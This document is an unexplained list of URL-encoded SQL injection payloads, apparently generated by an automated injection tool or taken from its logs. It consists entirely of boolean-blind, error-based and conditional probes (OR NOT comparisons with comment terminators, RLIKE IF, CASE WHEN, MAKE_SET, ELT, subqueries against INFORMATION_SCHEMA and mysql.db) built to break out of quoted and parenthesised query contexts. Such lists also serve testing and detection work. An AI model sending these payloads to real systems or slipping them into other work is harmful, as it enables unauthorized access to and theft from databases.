-9912%27%29%20OR%20NOT%20%288268%3D9184%29%23%20AND%20%28%27iEeb%27%3D%27iEeb -5241%27%29%20OR%20NOT%20%285797%3D5797%29%23%20AND%20%28%27ZVFw%27%3D%27ZVFw -3697%27%29%20OR%20NOT%20%289217%3D3693%29%23%20AND%20%28%27dfEu%27%3D%27dfEu -8472%27%29%29%20OR%20NOT%20%282174%3D5312%29%23%20AND%20%28%28%27FnvW%27%3D%27FnvW -4162%27%29%29%20OR%20NOT%20%285797%3D5797%29%23%20AND%20%28%28%27AapJ%27%3D%27AapJ -2990%27%29%29%20OR%20NOT%20%283806%3D6195%29%23%20AND%20%28%28%27ELAh%27%3D%27ELAh -3783%27%29%29%29%20OR%20NOT%20%286296%3D2921%29%23%20AND%20%28%28%28%27OkOH%27%3D%27OkOH -2656%27%29%29%29%20OR%20NOT%20%285797%3D5797%29%23%20AND%20%28%28%28%27ttbv%27%3D%27ttbv -7197%27%29%29%29%20OR%20NOT%20%282758%3D6682%29%23%20AND%20%28%28%28%27HdbO%27%3D%27HdbO -4086%27%20OR%20NOT%20%288907%3D4984%29%23%20AND%20%27AAId%27%3D%27AAId -8657%27%20OR%20NOT%20%285797%3D5797%29%23%20AND%20%27vqYU%27%3D%27vqYU -5465%27%20OR%20NOT%20%288657%3D1610%29%23%20AND%20%27tzRs%27%3D%27tzRs -8127%27%29%20OR%20NOT%20%283849%3D8855%29%23%20AND%20%28%27oPsk%27%20LIKE%20%27oPsk -4323%27%29%20OR%20NOT%20%285797%3D5797%29%23%20AND%20%28%27bdcw%27%20LIKE%20%27bdcw -6535%27%29%20OR%20NOT%20%284646%3D9799%29%23%20AND%20%28%27oRMT%27%20LIKE%20%27oRMT -5737%27%29%29%20OR%20NOT%20%287393%3D6265%29%23%20AND%20%28%28%27aDle%27%20LIKE%20%27aDle -5918%27%29%29%20OR%20NOT%20%285797%3D5797%29%23%20AND%20%28%28%27anlu%27%20LIKE%20%27anlu -9356%27%29%29%20OR%20NOT%20%287693%3D8743%29%23%20AND%20%28%28%27zYSL%27%20LIKE%20%27zYSL -2108%27%29%29%29%20OR%20NOT%20%289061%3D2879%29%23%20AND%20%28%28%28%27mEwC%27%20LIKE%20%27mEwC -6859%27%29%29%29%20OR%20NOT%20%285797%3D5797%29%23%20AND%20%28%28%28%27ljdr%27%20LIKE%20%27ljdr -7161%27%29%29%29%20OR%20NOT%20%288767%3D9047%29%23%20AND%20%28%28%28%27vrIF%27%20LIKE%20%27vrIF -4253%27%20OR%20NOT%20%284730%3D3720%29%23%20AND%20%27yMuA%27%20LIKE%20%27yMuA -5217%27%20OR%20NOT%20%285797%3D5797%29%23%20AND%20%27qiUc%27%20LIKE%20%27qiUc -6353%27%20OR%20NOT%20%281781%3D1386%29%23%20AND%20%27ELBF%27%20LIKE%20%27ELBF -6625%22%29%20OR%20NOT%20%285857%3D1504%29%23%20AND%20%28%22rpyA%22%3D%22rpyA -5899%22%29%20OR%20NOT%20%285797%3D5797%29%23%20AND%20%28%22SCOc%22%3D%22SCOc -7506%22%29%20OR%20NOT%20%287074%3D4493%29%23%20AND%20%28%22rGUM%22%3D%22rGUM -5580%22%29%29%20OR%20NOT%20%284500%3D5798%29%23%20AND%20%28%28%22fZXS%22%3D%22fZXS -1064%22%29%29%20OR%20NOT%20%285797%3D5797%29%23%20AND%20%28%28%22KunM%22%3D%22KunM -7130%22%29%29%20OR%20NOT%20%288666%3D5154%29%23%20AND%20%28%28%22ustQ%22%3D%22ustQ -1676%22%29%29%29%20OR%20NOT%20%283864%3D1414%29%23%20AND%20%28%28%28%22VoOo%22%3D%22VoOo -3669%22%29%29%29%20OR%20NOT%20%285797%3D5797%29%23%20AND%20%28%28%28%22tRGk%22%3D%22tRGk -8823%22%29%29%29%20OR%20NOT%20%283690%3D4056%29%23%20AND%20%28%28%28%22qTDo%22%3D%22qTDo -3110%22%20OR%20NOT%20%289383%3D7141%29%23%20AND%20%22NabD%22%3D%22NabD -3247%22%20OR%20NOT%20%285797%3D5797%29%23%20AND%20%22RRmk%22%3D%22RRmk -2735%22%20OR%20NOT%20%289439%3D3842%29%23%20AND%20%22zFRU%22%3D%22zFRU -5058%22%29%20OR%20NOT%20%283232%3D9845%29%23%20AND%20%28%22Vdsj%22%20LIKE%20%22Vdsj -8804%22%29%20OR%20NOT%20%285797%3D5797%29%23%20AND%20%28%22TUho%22%20LIKE%20%22TUho -1735%22%29%20OR%20NOT%20%287001%3D5876%29%23%20AND%20%28%22VKIg%22%20LIKE%20%22VKIg -7767%22%29%29%20OR%20NOT%20%285442%3D1413%29%23%20AND%20%28%28%22hOdx%22%20LIKE%20%22hOdx -8992%22%29%29%20OR%20NOT%20%285797%3D5797%29%23%20AND%20%28%28%22SlOP%22%20LIKE%20%22SlOP -2318%22%29%29%20OR%20NOT%20%289956%3D7135%29%23%20AND%20%28%28%22aARN%22%20LIKE%20%22aARN -4301%22%29%29%29%20OR%20NOT%20%289685%3D3210%29%23%20AND%20%28%28%28%22Mwyt%22%20LIKE%20%22Mwyt -1711%22%29%29%29%20OR%20NOT%20%285797%3D5797%29%23%20AND%20%28%28%28%22FSqz%22%20LIKE%20%22FSqz -6377%22%29%29%29%20OR%20NOT%20%287284%3D9914%29%23%20AND%20%28%28%28%22SgiN%22%20LIKE%20%22SgiN -3438%22%20OR%20NOT%20%282682%3D9517%29%23%20AND%20%22LtfC%22%20LIKE%20%22LtfC -9719%22%20OR%20NOT%20%285797%3D5797%29%23%20AND%20%22vcJQ%22%20LIKE%20%22vcJQ -5138%22%20OR%20NOT%20%281914%3D1863%29%23%20AND%20%22LXQw%22%20LIKE%20%22LXQw -5355%29%20WHERE%202218%3D2218%20OR%20NOT%20%286453%3D3334%29%23 -6298%29%20WHERE%202714%3D2714%20OR%20NOT%20%285797%3D5797%29%23 -1947%29%20WHERE%208779%3D8779%20OR%20NOT%20%289625%3D6159%29%23 -8070%27%29%20WHERE%203203%3D3203%20OR%20NOT%20%289453%3D4689%29%23 -9849%27%29%20WHERE%203015%3D3015%20OR%20NOT%20%285797%3D5797%29%23 -8785%27%29%20WHERE%202980%3D2980%20OR%20NOT%20%289839%3D3426%29%23 -7905%27%20WHERE%202611%3D2611%20OR%20NOT%20%287950%3D2662%29%23 -2719%27%20WHERE%204195%3D4195%20OR%20NOT%20%285797%3D5797%29%23 -1695%27%20WHERE%209983%3D9983%20OR%20NOT%20%289577%3D6382%29%23 -3033%22%20WHERE%203151%3D3151%20OR%20NOT%20%285690%3D8426%29%23 -4278%22%20WHERE%201557%3D1557%20OR%20NOT%20%285797%3D5797%29%23 -2405%22%20WHERE%209862%3D9862%20OR%20NOT%20%288073%3D9047%29%23 -3414%29%20OR%20NOT%20%284450%3D2683%29--%20 -4631%29%20OR%20NOT%20%285945%3D5945%29--%20 -8184%29%20OR%20NOT%20%286489%3D2743%29--%20 -9179%27%29%20OR%20NOT%20%287676%3D7967%29--%20 -5916%27%29%20OR%20NOT%20%285945%3D5945%29--%20 -2848%27%29%20OR%20NOT%20%287661%3D5386%29--%20 -8800%27%20OR%20NOT%20%288627%3D2985%29--%20 -5621%27%20OR%20NOT%20%285945%3D5945%29--%20 -2675%27%20OR%20NOT%20%287166%3D5958%29--%20 -2876%22%20OR%20NOT%20%288647%3D2997%29--%20 -5295%22%20OR%20NOT%20%285945%3D5945%29--%20 -9836%22%20OR%20NOT%20%284826%3D6291%29--%20 -5031%29%20OR%20NOT%20%284274%3D6711%29--%20%20AND%20%286797%3D6797 -5387%29%20OR%20NOT%20%285945%3D5945%29--%20%20AND%20%282544%3D2544 -9293%29%20OR%20NOT%20%285328%3D5618%29--%20%20AND%20%282194%3D2194 -2037%29%29%20OR%20NOT%20%283622%3D7464%29--%20%20AND%20%28%287159%3D7159 -2932%29%29%20OR%20NOT%20%285945%3D5945%29--%20%20AND%20%28%281340%3D1340 -5585%29%29%20OR%20NOT%20%284416%3D6358%29--%20%20AND%20%28%286512%3D6512 -4581%29%29%29%20OR%20NOT%20%284825%3D5350%29--%20%20AND%20%28%28%281213%3D1213 -6447%29%29%29%20OR%20NOT%20%285945%3D5945%29--%20%20AND%20%28%28%282693%3D2693 -6128%29%29%29%20OR%20NOT%20%284471%3D9795%29--%20%20AND%20%28%28%282492%3D2492 -8909%20OR%20NOT%20%282729%3D5218%29--%20 -1983%20OR%20NOT%20%285945%3D5945%29--%20 -9270%20OR%20NOT%20%283214%3D3456%29--%20 -2378%27%29%20OR%20NOT%20%285485%3D3326%29--%20%20AND%20%28%27PIkx%27%3D%27PIkx -3323%27%29%20OR%20NOT%20%285945%3D5945%29--%20%20AND%20%28%27Atrk%27%3D%27Atrk -5477%27%29%20OR%20NOT%20%289742%3D9880%29--%20%20AND%20%28%27lVTy%27%3D%27lVTy -1835%27%29%29%20OR%20NOT%20%285013%3D1528%29--%20%20AND%20%28%28%27deaO%27%3D%27deaO -3251%27%29%29%20OR%20NOT%20%285945%3D5945%29--%20%20AND%20%28%28%27nnBR%27%3D%27nnBR -5053%27%29%29%20OR%20NOT%20%284951%3D6721%29--%20%20AND%20%28%28%27iHvk%27%3D%27iHvk -1778%27%29%29%29%20OR%20NOT%20%283904%3D3758%29--%20%20AND%20%28%28%28%27HCtH%27%3D%27HCtH -9287%27%29%29%29%20OR%20NOT%20%285945%3D5945%29--%20%20AND%20%28%28%28%27CyBy%27%3D%27CyBy -4576%27%29%29%29%20OR%20NOT%20%281680%3D8645%29--%20%20AND%20%28%28%28%27RgXb%27%3D%27RgXb -3996%27%20OR%20NOT%20%283578%3D4385%29--%20%20AND%20%27xtRP%27%3D%27xtRP -9507%27%20OR%20NOT%20%285945%3D5945%29--%20%20AND%20%27AysM%27%3D%27AysM -2370%27%20OR%20NOT%20%285988%3D4474%29--%20%20AND%20%27MJDq%27%3D%27MJDq -2837%27%29%20OR%20NOT%20%281370%3D5446%29--%20%20AND%20%28%27OXlR%27%20LIKE%20%27OXlR -9173%27%29%20OR%20NOT%20%285945%3D5945%29--%20%20AND%20%28%27OIml%27%20LIKE%20%27OIml -1142%27%29%20OR%20NOT%20%287698%3D2790%29--%20%20AND%20%28%27NMvl%27%20LIKE%20%27NMvl -4413%27%29%29%20OR%20NOT%20%284732%3D8648%29--%20%20AND%20%28%28%27FzdJ%27%20LIKE%20%27FzdJ -4913%27%29%29%20OR%20NOT%20%285945%3D5945%29--%20%20AND%20%28%28%27SFJG%27%20LIKE%20%27SFJG -8729%27%29%29%20OR%20NOT%20%285779%3D9866%29--%20%20AND%20%28%28%27jntb%27%20LIKE%20%27jntb -8469%27%29%29%29%20OR%20NOT%20%288887%3D2377%29--%20%20AND%20%28%28%28%27TfrU%27%20LIKE%20%27TfrU -7691%27%29%29%29%20OR%20NOT%20%285945%3D5945%29--%20%20AND%20%28%28%28%27bUZr%27%20LIKE%20%27bUZr -1102%27%29%29%29%20OR%20NOT%20%282613%3D8517%29--%20%20AND%20%28%28%28%27rFEu%27%20LIKE%20%27rFEu -6207%27%20OR%20NOT%20%283947%3D6417%29--%20%20AND%20%27OzND%27%20LIKE%20%27OzND -9243%27%20OR%20NOT%20%285945%3D5945%29--%20%20AND%20%27zHjh%27%20LIKE%20%27zHjh -8121%27%20OR%20NOT%20%281671%3D4655%29--%20%20AND%20%27zVZl%27%20LIKE%20%27zVZl -1449%22%29%20OR%20NOT%20%286535%3D9150%29--%20%20AND%20%28%22saOP%22%3D%22saOP -9394%22%29%20OR%20NOT%20%285945%3D5945%29--%20%20AND%20%28%22MVVc%22%3D%22MVVc -4308%22%29%20OR%20NOT%20%289594%3D2951%29--%20%20AND%20%28%22xyMy%22%3D%22xyMy -7335%22%29%29%20OR%20NOT%20%289337%3D4178%29--%20%20AND%20%28%28%22HurI%22%3D%22HurI -1958%22%29%29%20OR%20NOT%20%285945%3D5945%29--%20%20AND%20%28%28%22gmrW%22%3D%22gmrW -6163%22%29%29%20OR%20NOT%20%284010%3D5776%29--%20%20AND%20%28%28%22WxSy%22%3D%22WxSy -9006%22%29%29%29%20OR%20NOT%20%287971%3D6409%29--%20%20AND%20%28%28%28%22xtHY%22%3D%22xtHY -2447%22%29%29%29%20OR%20NOT%20%285945%3D5945%29--%20%20AND%20%28%28%28%22XhXx%22%3D%22XhXx -3811%22%29%29%29%20OR%20NOT%20%286887%3D2935%29--%20%20AND%20%28%28%28%22gynI%22%3D%22gynI -6693%22%20OR%20NOT%20%289691%3D5096%29--%20%20AND%20%22NZmz%22%3D%22NZmz -9090%22%20OR%20NOT%20%285945%3D5945%29--%20%20AND%20%22YiWz%22%3D%22YiWz -6972%22%20OR%20NOT%20%286489%3D3105%29--%20%20AND%20%22ZxDA%22%3D%22ZxDA -1703%22%29%20OR%20NOT%20%287996%3D3964%29--%20%20AND%20%28%22FGQq%22%20LIKE%20%22FGQq -1844%22%29%20OR%20NOT%20%285945%3D5945%29--%20%20AND%20%28%22AEoB%22%20LIKE%20%22AEoB -3322%22%29%20OR%20NOT%20%284958%3D3219%29--%20%20AND%20%28%22TEiO%22%20LIKE%20%22TEiO -4465%22%29%29%20OR%20NOT%20%289401%3D7615%29--%20%20AND%20%28%28%22rhle%22%20LIKE%20%22rhle -3811%22%29%29%20OR%20NOT%20%285945%3D5945%29--%20%20AND%20%28%28%22qnIi%22%20LIKE%20%22qnIi -3348%22%29%29%20OR%20NOT%20%289093%3D9614%29--%20%20AND%20%28%28%22cukc%22%20LIKE%20%22cukc -3536%22%29%29%29%20OR%20NOT%20%284899%3D6935%29--%20%20AND%20%28%28%28%22CLBn%22%20LIKE%20%22CLBn -7382%22%29%29%29%20OR%20NOT%20%285945%3D5945%29--%20%20AND%20%28%28%28%22tOUR%22%20LIKE%20%22tOUR -6798%22%29%29%29%20OR%20NOT%20%284867%3D9201%29--%20%20AND%20%28%28%28%22UzfN%22%20LIKE%20%22UzfN -9724%22%20OR%20NOT%20%285267%3D5648%29--%20%20AND%20%22NXDP%22%20LIKE%20%22NXDP -1085%22%20OR%20NOT%20%285945%3D5945%29--%20%20AND%20%22xXlv%22%20LIKE%20%22xXlv -9063%22%20OR%20NOT%20%289737%3D3154%29--%20%20AND%20%22dyMB%22%20LIKE%20%22dyMB -2297%29%20WHERE%202516%3D2516%20OR%20NOT%20%288297%3D7175%29--%20 -2975%29%20WHERE%206021%3D6021%20OR%20NOT%20%285945%3D5945%29--%20 -5172%29%20WHERE%206257%3D6257%20OR%20NOT%20%283436%3D5795%29--%20 -6476%27%29%20WHERE%201398%3D1398%20OR%20NOT%20%284577%3D3232%29--%20 -2847%27%29%20WHERE%205746%3D5746%20OR%20NOT%20%285945%3D5945%29--%20 -3931%27%29%20WHERE%209717%3D9717%20OR%20NOT%20%283832%3D8656%29--%20 -3794%27%20WHERE%204174%3D4174%20OR%20NOT%20%282792%3D3491%29--%20 -8166%27%20WHERE%208933%3D8933%20OR%20NOT%20%285945%3D5945%29--%20 -3222%27%20WHERE%201511%3D1511%20OR%20NOT%20%285352%3D3982%29--%20 -4021%22%20WHERE%208704%3D8704%20OR%20NOT%20%284224%3D8795%29--%20 -9980%22%20WHERE%201219%3D1219%20OR%20NOT%20%285945%3D5945%29--%20 -5292%22%20WHERE%206511%3D6511%20OR%20NOT%20%284918%3D8566%29--%20 1%29%20RLIKE%20IF%281537%3D1537%2C1%2C0x28%29 1%29%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29 1%29%20RLIKE%20IF%281783%3D1783%2C1%2C0x28%29 1%27%29%20RLIKE%20IF%289052%3D9052%2C1%2C0x28%29 1%27%29%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29 1%27%29%20RLIKE%20IF%283057%3D3057%2C1%2C0x28%29 1%27%20RLIKE%20IF%287048%3D7048%2C1%2C0x28%29 1%27%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29 1%27%20RLIKE%20IF%289274%3D9274%2C1%2C0x28%29 1%22%20RLIKE%20IF%287334%3D7334%2C1%2C0x28%29 1%22%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29 1%22%20RLIKE%20IF%283811%3D3811%2C1%2C0x28%29 1%29%20RLIKE%20IF%285340%3D5340%2C1%2C0x28%29%20AND%20%288739%3D8739 1%29%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29%20AND%20%282567%3D2567 1%29%20RLIKE%20IF%285919%3D5919%2C1%2C0x28%29%20AND%20%284702%3D4702 1%29%29%20RLIKE%20IF%282990%3D2990%2C1%2C0x28%29%20AND%20%28%281001%3D1001 1%29%29%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29%20AND%20%28%281215%3D1215 1%29%29%20RLIKE%20IF%281297%3D1297%2C1%2C0x28%29%20AND%20%28%286374%3D6374 1%29%29%29%20RLIKE%20IF%286969%3D6969%2C1%2C0x28%29%20AND%20%28%28%285678%3D5678 1%29%29%29%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29%20AND%20%28%28%285619%3D5619 1%29%29%29%20RLIKE%20IF%289911%3D9911%2C1%2C0x28%29%20AND%20%28%28%288757%3D8757 1%20RLIKE%20IF%286479%3D6479%2C1%2C0x28%29 1%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29 1%20RLIKE%20IF%288268%3D8268%2C1%2C0x28%29 1%27%29%20RLIKE%20IF%288773%3D8773%2C1%2C0x28%29%20AND%20%28%27MeXs%27%3D%27MeXs 1%27%29%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29%20AND%20%28%27vuRW%27%3D%27vuRW 1%27%29%20RLIKE%20IF%283779%3D3779%2C1%2C0x28%29%20AND%20%28%27wTMo%27%3D%27wTMo 1%27%29%29%20RLIKE%20IF%284461%3D4461%2C1%2C0x28%29%20AND%20%28%28%27nRYg%27%3D%27nRYg 1%27%29%29%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29%20AND%20%28%28%27zahb%27%3D%27zahb 1%27%29%29%20RLIKE%20IF%283727%3D3727%2C1%2C0x28%29%20AND%20%28%28%27jDCH%27%3D%27jDCH 1%27%29%29%29%20RLIKE%20IF%284216%3D4216%2C1%2C0x28%29%20AND%20%28%28%28%27wqAc%27%3D%27wqAc 1%27%29%29%29%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29%20AND%20%28%28%28%27sZcQ%27%3D%27sZcQ 1%27%29%29%29%20RLIKE%20IF%283815%3D3815%2C1%2C0x28%29%20AND%20%28%28%28%27cuGH%27%3D%27cuGH 1%27%20RLIKE%20IF%284688%3D4688%2C1%2C0x28%29%20AND%20%27eFkO%27%3D%27eFkO 1%27%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29%20AND%20%27jOEB%27%3D%27jOEB 1%27%20RLIKE%20IF%286958%3D6958%2C1%2C0x28%29%20AND%20%27fxcY%27%3D%27fxcY 1%27%29%20RLIKE%20IF%286622%3D6622%2C1%2C0x28%29%20AND%20%28%27fOaG%27%20LIKE%20%27fOaG 1%27%29%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29%20AND%20%28%27XAzQ%27%20LIKE%20%27XAzQ 1%27%29%20RLIKE%20IF%283502%3D3502%2C1%2C0x28%29%20AND%20%28%27aXvs%27%20LIKE%20%27aXvs 1%27%29%29%20RLIKE%20IF%289085%3D9085%2C1%2C0x28%29%20AND%20%28%28%27QnDR%27%20LIKE%20%27QnDR 1%27%29%29%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29%20AND%20%28%28%27mJxO%27%20LIKE%20%27mJxO 1%27%29%29%20RLIKE%20IF%282412%3D2412%2C1%2C0x28%29%20AND%20%28%28%27ScWj%27%20LIKE%20%27ScWj 1%27%29%29%29%20RLIKE%20IF%286110%3D6110%2C1%2C0x28%29%20AND%20%28%28%28%27AKBI%27%20LIKE%20%27AKBI 1%27%29%29%29%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29%20AND%20%28%28%28%27hMXW%27%20LIKE%20%27hMXW 1%27%29%29%29%20RLIKE%20IF%285685%3D5685%2C1%2C0x28%29%20AND%20%28%28%28%27uRJZ%27%20LIKE%20%27uRJZ 1%27%20RLIKE%20IF%289988%3D9988%2C1%2C0x28%29%20AND%20%27Xdjm%27%20LIKE%20%27Xdjm 1%27%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29%20AND%20%27mReA%27%20LIKE%20%27mReA 1%27%20RLIKE%20IF%288160%3D8160%2C1%2C0x28%29%20AND%20%27hMxC%27%20LIKE%20%27hMxC 1%22%29%20RLIKE%20IF%282188%3D2188%2C1%2C0x28%29%20AND%20%28%22bGzL%22%3D%22bGzL 1%22%29%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29%20AND%20%28%22xbSK%22%3D%22xbSK 1%22%29%20RLIKE%20IF%289736%3D9736%2C1%2C0x28%29%20AND%20%28%22oTtw%22%3D%22oTtw 1%22%29%29%20RLIKE%20IF%281870%3D1870%2C1%2C0x28%29%20AND%20%28%28%22ntgn%22%3D%22ntgn 1%22%29%29%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29%20AND%20%28%28%22EEng%22%3D%22EEng 1%22%29%29%20RLIKE%20IF%289656%3D9656%2C1%2C0x28%29%20AND%20%28%28%22dzWs%22%3D%22dzWs 1%22%29%29%29%20RLIKE%20IF%283079%3D3079%2C1%2C0x28%29%20AND%20%28%28%28%22hswc%22%3D%22hswc 1%22%29%29%29%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29%20AND%20%28%28%28%22rliu%22%3D%22rliu 1%22%29%29%29%20RLIKE%20IF%283646%3D3646%2C1%2C0x28%29%20AND%20%28%28%28%22fzwE%22%3D%22fzwE 1%22%20RLIKE%20IF%281449%3D1449%2C1%2C0x28%29%20AND%20%22zSDz%22%3D%22zSDz 1%22%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29%20AND%20%22HxYJ%22%3D%22HxYJ 1%22%20RLIKE%20IF%289183%3D9183%2C1%2C0x28%29%20AND%20%22hNhX%22%3D%22hNhX 1%22%29%20RLIKE%20IF%284967%3D4967%2C1%2C0x28%29%20AND%20%28%22OgLK%22%20LIKE%20%22OgLK 1%22%29%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29%20AND%20%28%22JAch%22%20LIKE%20%22JAch 1%22%29%20RLIKE%20IF%287931%3D7931%2C1%2C0x28%29%20AND%20%28%22Ynew%22%20LIKE%20%22Ynew 1%22%29%29%20RLIKE%20IF%284225%3D4225%2C1%2C0x28%29%20AND%20%28%28%22uZbA%22%20LIKE%20%22uZbA 1%22%29%29%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29%20AND%20%28%28%22mTqS%22%20LIKE%20%22mTqS 1%22%29%29%20RLIKE%20IF%287605%3D7605%2C1%2C0x28%29%20AND%20%28%28%22rwxm%22%20LIKE%20%22rwxm 1%22%29%29%29%20RLIKE%20IF%286294%3D6294%2C1%2C0x28%29%20AND%20%28%28%28%22XOXy%22%20LIKE%20%22XOXy 1%22%29%29%29%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29%20AND%20%28%28%28%22MzqU%22%20LIKE%20%22MzqU 1%22%29%29%29%20RLIKE%20IF%289726%3D9726%2C1%2C0x28%29%20AND%20%28%28%28%22hjIX%22%20LIKE%20%22hjIX 1%22%20RLIKE%20IF%281010%3D1010%2C1%2C0x28%29%20AND%20%22irzV%22%20LIKE%20%22irzV 1%22%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29%20AND%20%22CyHs%22%20LIKE%20%22CyHs 1%22%20RLIKE%20IF%283300%3D3300%2C1%2C0x28%29%20AND%20%22nAiD%22%20LIKE%20%22nAiD 1%29%20WHERE%202004%3D2004%20RLIKE%20IF%284109%3D4109%2C1%2C0x28%29 1%29%20WHERE%205490%3D5490%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29 1%29%20WHERE%202520%3D2520%20RLIKE%20IF%286132%3D6132%2C1%2C0x28%29 1%27%29%20WHERE%202108%3D2108%20RLIKE%20IF%288375%3D8375%2C1%2C0x28%29 1%27%29%20WHERE%209314%3D9314%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29 1%27%29%20WHERE%207846%3D7846%20RLIKE%20IF%283393%3D3393%2C1%2C0x28%29 1%27%20WHERE%207196%3D7196%20RLIKE%20IF%289382%3D9382%2C1%2C0x28%29 1%27%20WHERE%203213%3D3213%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29 1%27%20WHERE%201625%3D1625%20RLIKE%20IF%289486%3D9486%2C1%2C0x28%29 1%22%20WHERE%201164%3D1164%20RLIKE%20IF%288749%3D8749%2C1%2C0x28%29 1%22%20WHERE%205042%3D5042%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29 1%22%20WHERE%205592%3D5592%20RLIKE%20IF%287016%3D7016%2C1%2C0x28%29 1%27%20%7C%7C%20%28SELECT%203060%20FROM%20DUAL%20WHERE%205303%3D5303%20RLIKE%20IF%287391%3D7391%2C1%2C0x28%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206223%20FROM%20DUAL%20WHERE%207303%3D7303%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206985%20FROM%20DUAL%20WHERE%206946%3D6946%20RLIKE%20IF%286186%3D6186%2C1%2C0x28%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203721%20WHERE%201905%3D1905%20RLIKE%20IF%282320%3D2320%2C1%2C0x28%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201217%20WHERE%208163%3D8163%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202145%20WHERE%207574%3D7574%20RLIKE%20IF%286201%3D6201%2C1%2C0x28%29%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%204532%20FROM%20DUAL%20WHERE%201627%3D1627%20RLIKE%20IF%287441%3D7441%2C1%2C0x28%29%20%29 1%20%2B%20%28SELECT%203425%20FROM%20DUAL%20WHERE%208237%3D8237%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29%20%29 1%20%2B%20%28SELECT%204339%20FROM%20DUAL%20WHERE%201710%3D1710%20RLIKE%20IF%285042%3D5042%2C1%2C0x28%29%20%29 1%20%2B%20%28SELECT%204175%20WHERE%202964%3D2964%20RLIKE%20IF%283276%3D3276%2C1%2C0x28%29%20%29 1%20%2B%20%28SELECT%201840%20WHERE%207638%3D7638%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29%20%29 1%20%2B%20%28SELECT%209588%20WHERE%204737%3D4737%20RLIKE%20IF%284538%3D4538%2C1%2C0x28%29%20%29 1%27%20%2B%20%28SELECT%20%27DZqQ%27%20FROM%20DUAL%20WHERE%201552%3D1552%20RLIKE%20IF%281130%3D1130%2C1%2C0x28%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27YCnm%27%20FROM%20DUAL%20WHERE%203952%3D3952%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27AzwZ%27%20FROM%20DUAL%20WHERE%202588%3D2588%20RLIKE%20IF%283729%3D3729%2C1%2C0x28%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27jilm%27%20WHERE%209889%3D9889%20RLIKE%20IF%283807%3D3807%2C1%2C0x28%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27tDDk%27%20WHERE%201297%3D1297%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27JZIk%27%20WHERE%202379%3D2379%20RLIKE%20IF%284384%3D4384%2C1%2C0x28%29%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20RLIKE%20IF%281947%3D1947%2C1%2C0x28%29%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20RLIKE%20IF%286335%3D6335%2C1%2C0x28%29%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20RLIKE%20IF%281700%3D1700%2C1%2C0x28%29%20%23 %28SELECT%20%28CASE%20WHEN%20%283782%3D3394%29%20THEN%201%20ELSE%201%2F%28SELECT%200%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%287508%3D7508%29%20THEN%201%20ELSE%201%2F%28SELECT%200%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%281821%3D2288%29%20THEN%201%20ELSE%201%2F%28SELECT%200%29%20END%29%29 MAKE_SET%283776%3D7419%2C1%29 MAKE_SET%283952%3D3952%2C1%29 MAKE_SET%283611%3D4371%2C1%29 ELT%283905%3D5431%2C1%29 ELT%285152%3D5152%2C1%29 ELT%289352%3D4778%2C1%29 %281739%3D3333%29%2A1 %288446%3D8446%29%2A1 %283836%3D6548%29%2A1 %28SELECT%20%28CASE%20WHEN%20%281626%3D4704%29%20THEN%201%20ELSE%201626%2A%28SELECT%201626%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%288989%3D8989%29%20THEN%201%20ELSE%208989%2A%28SELECT%208989%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%287885%3D7950%29%20THEN%201%20ELSE%207885%2A%28SELECT%207885%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%283246%3D7247%29%20THEN%201%20ELSE%203246%2A%28SELECT%203246%20FROM%20mysql.db%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%286427%3D6427%29%20THEN%201%20ELSE%206427%2A%28SELECT%206427%20FROM%20mysql.db%29%20END%29%29 